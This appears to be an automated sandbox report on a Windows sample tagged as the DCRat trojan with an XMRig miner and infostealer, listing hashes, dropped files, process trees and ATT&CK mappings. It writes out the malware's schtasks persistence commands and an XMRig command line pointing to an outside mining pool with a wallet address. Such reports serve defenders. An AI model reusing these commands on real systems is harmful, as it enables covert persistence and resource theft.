dcrat | c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e

Analysis

max time kernel
106s
max time network
109s
platform
windows10_x64
resource
win10v20210410
submitted
22-07-2021 22:41

Sharing

Copy URL

Twitter E-mail

Reason

Remote task has failed: Machine shutdown

Report Analysis Logs

General

Target

Software v3.0.5.exe
Size

910KB
MD5

56d73f0b8c89094a9f0ad6277f042b3d
SHA1

6efe8b8257f030fdb63a069aad558b6282310a31
SHA256

c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e
SHA512

6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379

Score

10^/10

dcrat xmrig infostealer miner rat spyware stealer

Malware Config

Signatures

DCrat 2 IoCs

DarkCrystalrat.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Dcr.exe	Dark_crystal_rat
C:\Users\Admin\AppData\Roaming\Dcr.exe	Dark_crystal_rat

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

DCRat Payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Dcr.exe	dcrat
C:\Users\Admin\AppData\Roaming\Dcr.exe	dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe	dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe	dcrat
C:\Program Files (x86)\Windows Sidebar\conhost.exe	dcrat
C:\Program Files (x86)\Windows Sidebar\conhost.exe	dcrat

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2712-198-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/2712-199-0x00000001402EB66C-mapping.dmp	xmrig
behavioral2/memory/2712-201-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 9 IoCs

Processes:

Dcr.exeetc.exexmr.exefonthostSvcIntodhcp.execonhost.exeservices64.exeservices32.exesihost64.exesihost32.exe

pid	process
1440	Dcr.exe
1584	etc.exe
1852	xmr.exe
1580	fonthostSvcIntodhcp.exe
3172	conhost.exe
2276	services64.exe
2316	services32.exe
2704	sihost64.exe
2184	sihost32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 ipinfo.io
17 ipinfo.io

flow	ioc
16	ipinfo.io
17	ipinfo.io

Drops file in System32 directory 4 IoCs

Processes:

fonthostSvcIntodhcp.exe

description	ioc	process
File created	C:\Windows\System32\kbdfar\fontdrvhost.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\kbdfar\5b884080fd4f94e2695da25c503f9e33b9605b83	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\ws2_32\winlogon.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\ws2_32\cc11b995f2a76da408ea6a601e682e64743153ad	fonthostSvcIntodhcp.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

services64.exe

description pid process target process

PID 2276 set thread context of 2712 2276 services64.exe explorer.exe

description	pid	process	target process
PID 2276 set thread context of 2712	2276	services64.exe	explorer.exe

Drops file in Program Files directory 3 IoCs

Processes:

fonthostSvcIntodhcp.exe

description	ioc	process
File created	C:\Program Files (x86)\Windows Sidebar\conhost.exe	fonthostSvcIntodhcp.exe
File created	C:\Program Files (x86)\Windows Sidebar\088424020bedd6b28ac7fd22ee35dcd7322895ce	fonthostSvcIntodhcp.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\conhost.exe	fonthostSvcIntodhcp.exe

Drops file in Windows directory 5 IoCs

Processes:

fonthostSvcIntodhcp.exe

description	ioc	process
File created	C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxSignature\ShellExperienceHost.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxSignature\f8c8f1285d826bc63910aaf97db97186ba642b4f	fonthostSvcIntodhcp.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SmartExtraction\SearchUI.exe	fonthostSvcIntodhcp.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SmartExtraction\SearchUI.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SmartExtraction\dab4d89cac03ec27dbe47b361df763dc3f848f6c	fonthostSvcIntodhcp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2692	schtasks.exe
3520	schtasks.exe
744	schtasks.exe
1972	schtasks.exe
1560	schtasks.exe
2832	schtasks.exe
1616	schtasks.exe
400	schtasks.exe
3520	schtasks.exe
2004	schtasks.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1"	LogonUI.exe

Modifies registry class 1 IoCs

Processes:

Dcr.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings Dcr.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	Dcr.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

fonthostSvcIntodhcp.execonhost.exeetc.exexmr.exeservices32.exeservices64.exe

pid	process
1580	fonthostSvcIntodhcp.exe
1580	fonthostSvcIntodhcp.exe
1580	fonthostSvcIntodhcp.exe
1580	fonthostSvcIntodhcp.exe
1580	fonthostSvcIntodhcp.exe
3172	conhost.exe
3172	conhost.exe
1584	etc.exe
1852	xmr.exe
2316	services32.exe
2276	services64.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

fonthostSvcIntodhcp.execonhost.exeetc.exexmr.exeservices32.exeservices64.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1580	fonthostSvcIntodhcp.exe
Token: SeDebugPrivilege	3172	conhost.exe
Token: SeDebugPrivilege	1584	etc.exe
Token: SeDebugPrivilege	1852	xmr.exe
Token: SeDebugPrivilege	2316	services32.exe
Token: SeDebugPrivilege	2276	services64.exe
Token: SeLockMemoryPrivilege	2712	explorer.exe
Token: SeLockMemoryPrivilege	2712	explorer.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

LogonUI.exe

pid process

1560 LogonUI.exe
1560 LogonUI.exe

pid	process
1560	LogonUI.exe
1560	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Software v3.0.5.exeDcr.exeWScript.execmd.exefonthostSvcIntodhcp.exexmr.exeetc.execmd.execmd.exeservices32.exeservices64.execmd.execmd.exe

description	pid	process	target process
PID 3256 wrote to memory of 1440	3256	Software v3.0.5.exe	Dcr.exe
PID 3256 wrote to memory of 1440	3256	Software v3.0.5.exe	Dcr.exe
PID 3256 wrote to memory of 1440	3256	Software v3.0.5.exe	Dcr.exe
PID 3256 wrote to memory of 1584	3256	Software v3.0.5.exe	etc.exe
PID 3256 wrote to memory of 1584	3256	Software v3.0.5.exe	etc.exe
PID 3256 wrote to memory of 1852	3256	Software v3.0.5.exe	xmr.exe
PID 3256 wrote to memory of 1852	3256	Software v3.0.5.exe	xmr.exe
PID 1440 wrote to memory of 1884	1440	Dcr.exe	WScript.exe
PID 1440 wrote to memory of 1884	1440	Dcr.exe	WScript.exe
PID 1440 wrote to memory of 1884	1440	Dcr.exe	WScript.exe
PID 1884 wrote to memory of 2876	1884	WScript.exe	cmd.exe
PID 1884 wrote to memory of 2876	1884	WScript.exe	cmd.exe
PID 1884 wrote to memory of 2876	1884	WScript.exe	cmd.exe
PID 2876 wrote to memory of 1580	2876	cmd.exe	fonthostSvcIntodhcp.exe
PID 2876 wrote to memory of 1580	2876	cmd.exe	fonthostSvcIntodhcp.exe
PID 1580 wrote to memory of 2692	1580	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1580 wrote to memory of 2692	1580	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1580 wrote to memory of 2832	1580	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1580 wrote to memory of 2832	1580	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1580 wrote to memory of 1616	1580	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1580 wrote to memory of 1616	1580	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1580 wrote to memory of 3520	1580	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1580 wrote to memory of 3520	1580	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1580 wrote to memory of 744	1580	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1580 wrote to memory of 744	1580	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1580 wrote to memory of 1972	1580	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1580 wrote to memory of 1972	1580	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1580 wrote to memory of 3172	1580	fonthostSvcIntodhcp.exe	conhost.exe
PID 1580 wrote to memory of 3172	1580	fonthostSvcIntodhcp.exe	conhost.exe
PID 1852 wrote to memory of 2544	1852	xmr.exe	cmd.exe
PID 1852 wrote to memory of 2544	1852	xmr.exe	cmd.exe
PID 1584 wrote to memory of 3372	1584	etc.exe	cmd.exe
PID 1584 wrote to memory of 3372	1584	etc.exe	cmd.exe
PID 2544 wrote to memory of 1560	2544	cmd.exe	schtasks.exe
PID 2544 wrote to memory of 1560	2544	cmd.exe	schtasks.exe
PID 3372 wrote to memory of 400	3372	cmd.exe	schtasks.exe
PID 3372 wrote to memory of 400	3372	cmd.exe	schtasks.exe
PID 1584 wrote to memory of 2316	1584	etc.exe	services32.exe
PID 1584 wrote to memory of 2316	1584	etc.exe	services32.exe
PID 1852 wrote to memory of 2276	1852	xmr.exe	services64.exe
PID 1852 wrote to memory of 2276	1852	xmr.exe	services64.exe
PID 2316 wrote to memory of 1844	2316	services32.exe	cmd.exe
PID 2316 wrote to memory of 1844	2316	services32.exe	cmd.exe
PID 2276 wrote to memory of 3028	2276	services64.exe	cmd.exe
PID 2276 wrote to memory of 3028	2276	services64.exe	cmd.exe
PID 2316 wrote to memory of 2184	2316	services32.exe	sihost32.exe
PID 2316 wrote to memory of 2184	2316	services32.exe	sihost32.exe
PID 2276 wrote to memory of 2704	2276	services64.exe	sihost64.exe
PID 2276 wrote to memory of 2704	2276	services64.exe	sihost64.exe
PID 3028 wrote to memory of 3520	3028	cmd.exe	schtasks.exe
PID 3028 wrote to memory of 3520	3028	cmd.exe	schtasks.exe
PID 1844 wrote to memory of 2004	1844	cmd.exe	schtasks.exe
PID 1844 wrote to memory of 2004	1844	cmd.exe	schtasks.exe
PID 2276 wrote to memory of 2712	2276	services64.exe	explorer.exe
PID 2276 wrote to memory of 2712	2276	services64.exe	explorer.exe
PID 2276 wrote to memory of 2712	2276	services64.exe	explorer.exe
PID 2276 wrote to memory of 2712	2276	services64.exe	explorer.exe
PID 2276 wrote to memory of 2712	2276	services64.exe	explorer.exe
PID 2276 wrote to memory of 2712	2276	services64.exe	explorer.exe
PID 2276 wrote to memory of 2712	2276	services64.exe	explorer.exe
PID 2276 wrote to memory of 2712	2276	services64.exe	explorer.exe
PID 2276 wrote to memory of 2712	2276	services64.exe	explorer.exe
PID 2276 wrote to memory of 2712	2276	services64.exe	explorer.exe
PID 2276 wrote to memory of 2712	2276	services64.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe
"C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3256

C:\Users\Admin\AppData\Roaming\Dcr.exe
C:\Users\Admin\AppData\Roaming\Dcr.exe
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\fonthostSvc\5R3FFGftzpp.vbe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2876

C:\fonthostSvc\fonthostSvcIntodhcp.exe
"C:\fonthostSvc\fonthostSvcIntodhcp.exe"
5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1580

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SmartExtraction\SearchUI.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:2692

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\conhost.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:2832

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\kbdfar\fontdrvhost.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1616

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxSignature\ShellExperienceHost.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:3520

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\PerfLogs\ShellExperienceHost.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:744

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\ws2_32\winlogon.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1972

C:\Program Files (x86)\Windows Sidebar\conhost.exe
"C:\Program Files (x86)\Windows Sidebar\conhost.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3172

C:\Users\Admin\AppData\Roaming\etc.exe
C:\Users\Admin\AppData\Roaming\etc.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:3372

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
4⤵
- Creates scheduled task(s)
PID:400

C:\Users\Admin\AppData\Roaming\services32.exe
"C:\Users\Admin\AppData\Roaming\services32.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1844

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
5⤵
- Creates scheduled task(s)
PID:2004

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:2184

C:\Users\Admin\AppData\Roaming\xmr.exe
C:\Users\Admin\AppData\Roaming\xmr.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1852

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
4⤵
- Creates scheduled task(s)
PID:1560

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2276

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:3028

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
5⤵
- Creates scheduled task(s)
PID:3520

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:2704

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2712

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3ade855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1560

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Windows Sidebar\conhost.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\Program Files (x86)\Windows Sidebar\conhost.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\Users\Admin\AppData\Roaming\Dcr.exe
MD5
975a0ad02701f9f528784dee5a9728d2

SHA1
8a3b57da095dd6fc9d61fe004c1025d929370515

SHA256
b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

SHA512
6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

Download Submit
C:\Users\Admin\AppData\Roaming\Dcr.exe
MD5
975a0ad02701f9f528784dee5a9728d2

SHA1
8a3b57da095dd6fc9d61fe004c1025d929370515

SHA256
b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

SHA512
6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
89c453dbd36f561195de8e5c5dce77a0

SHA1
8cc44dd7646ec89b6c22214614a8cab158e47f0c

SHA256
ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

SHA512
c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
89c453dbd36f561195de8e5c5dce77a0

SHA1
8cc44dd7646ec89b6c22214614a8cab158e47f0c

SHA256
ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

SHA512
c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
7059ba6625325156b764224d2b2dbd83

SHA1
4cc34def0b7d39b913559f539e6d58a3e363f2e3

SHA256
04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

SHA512
ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
7059ba6625325156b764224d2b2dbd83

SHA1
4cc34def0b7d39b913559f539e6d58a3e363f2e3

SHA256
04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

SHA512
ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

Download Submit
C:\Users\Admin\AppData\Roaming\etc.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\etc.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\services32.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\services32.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\services64.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Users\Admin\AppData\Roaming\services64.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Users\Admin\AppData\Roaming\xmr.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Users\Admin\AppData\Roaming\xmr.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\fonthostSvc\5R3FFGftzpp.vbe
MD5
cb60c41590dc32740e8923ba0cb6df97

SHA1
aabc007b611df20e79fceee539ef63e7f2754304

SHA256
c48aa50f0879775b7f0d878898cc662b8ea0412f401fb6c17be945ffd63cfda2

SHA512
a42de214aef793c75cf1928c0734b65bd1817c4b36aae663c9119539ab8bec6b7e1881d8ad971a2fc4e8afe09958bc395928ce5e3eb393cb5b755e14e71264da

Download Submit
